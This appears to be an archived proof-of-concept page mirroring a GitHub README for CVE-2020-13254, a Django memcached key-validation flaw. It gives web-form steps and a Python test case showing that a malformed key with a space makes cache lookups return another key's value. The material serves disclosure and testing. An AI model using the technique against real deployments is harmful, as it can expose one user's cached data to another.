Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-13254 PoC — Django 信任管理问题漏洞

Source
https://github.com/danpalmer/django-cve-2020-13254
Associated Vulnerability
Title:Django 信任管理问题漏洞 (CVE-2020-13254)
Description:Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 2.2.13之前的2.2版本和33.0.7之前的3.0版本中存在信任管理问题漏洞。攻击者可利用该漏洞获取敏感信息。
Description
Vulnerability demonstration for Django CVE-2020-13254
Readme
# Django CVE-2020-13254

This repository demonstrates exploitation of CVE-2020-13254 in two ways – via a
web interface and via a failing test case.

For more details visit:

<https://danpalmer.me/2020-06-07-django-memcache-vulnerability/>

### Exploiting via the web

The example provides a web interface with 2 forms, one that sets values in the
cache and the other that gets them. These are directly translated into calls to
the Django cache backend. Because the codebase does not implement any session or
authentication system, multiple uses in the same browser tab are
indistinguishable from multiple users using between machines.

To exploit:

1. Set keys of **A** and **B** to values **a** and **b**.
2. Attempt to set **C D** to value **c d**. This will error.
3. Attempt to retrieve key **A**, there will incorrectly be no result.
4. Attempt to retrieve key **B**, the result will incorrectly be **a**.

### Demo via tests

This process can be expressed as a test case as such:

```python
from django.core.cache import cache
from django.test import TestCase


class CacheTests(TestCase):
    def test_cache(self):
        cache.set('k1', 'v1')
        cache.set('k2', 'v2')
        try:
            cache.set('a b', 'v3')
        except Exception:
            pass
        self.assertEqual(
            [
              cache.get(x) for x in
              ['k2', 'k1', 'k2', 'k1', 'k2', 'k1']
            ],
            ['v2', 'v1', 'v2', 'v1', 'v2', 'v1'],
        )
```

This fails with the following error:

```
=============================================================
FAIL: test_cache (demo.tests.CacheTests)
-------------------------------------------------------------
Traceback (most recent call last):
  File "tests.py", line 30, in test_cache
    'v1',
AssertionError: Lists differ

First differing element 0:
None
'v2'

- [None, 'v2', 'v1', 'v2', 'v1', 'v2']
?  ------

+ ['v2', 'v1', 'v2', 'v1', 'v2', 'v1']
?                              ++++++

-------------------------------------------------------------
```

After the `set`, the cache results being returned are out of step with the
queries being made.
File Snapshot

 [4.0K]  /data/pocs/b23ac93b862959c9e56a658bcd2e075f5e2c0e92
├── [4.0K]  demo
│   ├── [4.0K]  demo
│   │   ├── [ 385]  asgi.py
│   │   ├── [   0]  __init__.py
│   │   ├── [1.3K]  settings.py
│   │   ├── [4.0K]  templates
│   │   │   └── [ 493]  index.html
│   │   ├── [ 702]  tests.py
│   │   ├── [ 132]  urls.py
│   │   ├── [ 393]  views.py
│   │   └── [ 385]  wsgi.py
│   └── [ 624]  manage.py
├── [2.1K]  README.md
└── [  73]  requirements.txt

3 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.